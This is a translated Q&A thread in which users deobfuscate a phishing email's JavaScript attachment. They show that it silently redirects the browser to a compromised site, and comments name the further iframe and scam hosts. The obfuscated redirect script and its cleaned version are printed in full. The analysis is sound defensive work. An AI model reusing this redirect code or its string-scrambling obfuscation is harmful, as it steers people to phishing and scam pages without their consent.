【问题标题】:What does this suspicious phishing code do?这个可疑的网络钓鱼代码有什么作用?
【发布时间】:2011-03-02 00:53:45
【问题描述】:

我的一些非 IT 同事在一封看起来非常可疑的电子邮件中打开了一个 .html 附件。当似乎运行了一些 javascript 代码时,它会导致一个空白屏幕。

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

它做了什么?这超出了我的编程知识范围。

【问题讨论】:

    标签: javascript phishing


    【解决方案1】:

    它将重定向到一个 url,'http://lendermedia.com/images/z.htm'(跟随它,风险自负)。

    将代码复制并粘贴到有价值的 JavaScript 编辑器中,并让它为您格式化源代码。

    要点:

    var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');
    

    h 将等于“http://lendermedia.com/images/z.htm

    t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
    

    t 将包含对document.location 的引用

    b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
    

    b 中名为href 的属性,此时(在另一个函数中)实际上是上述语句中的t,设置为h,即url。

    大部分代码只是噪音,实际功能包括:

    function uK() {
    };
    uK.prototype = {
      f : function() {
        var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'
            .replace(/[\^H\!9X]/g, '');
        t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
        function x(b) {
          b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
        }
        x(t);
      }
    };
    var tL = new uK();
    tL.f();
    

    【讨论】:

    • 我不建议任何人点击此链接。该页面从onionfleet.ru:8080/index.php?pid=10 加载一个iframe,并重定向到mouselong.com。另外不要点击此评论中的链接,除非您知道自己在做什么。
    • 其中又包含一个 iframe 链接到某个销售不太正宗手表的诈骗网站...
    【解决方案2】:

    减去混淆,它的作用类似于document.location.href="http://lendermedia.com/images/z.htm"

    【讨论】:

      【解决方案3】:

      理解代码的关键部分是replace(/[\^H\!9X]/g, '') 部分。如果替换的第二个参数是'',那么它只是从前一个字符串中删除内容。

      混淆事物的方式非常不雅。可能目标只是为每个用户随机分配并避免贝叶斯垃圾邮件过滤器。

      【讨论】:

        【解决方案4】:

        我遇到了同样的问题,然后找到了这个页面。在为联系信息进行了 WHOIS 后,我联系了 lendermedia.com 的所有者,他似乎刚刚发现他的网站托管了 z.htm 页面,而他并不知情并且违背了他的意愿。在我联系他时,我能够浏览他的/images/ 目录。此后,他更改了权限。这一切都表明这家伙看起来很干净,但这是由你决定的。

        【讨论】:

          猜你喜欢
          • 1970-01-01
          • 1970-01-01
          • 2017-11-19
          • 2014-12-27
          • 1970-01-01
          • 2021-09-07
          • 2020-01-16
          • 2023-04-10
          • 2017-11-27
          相关资源
          最近更新 更多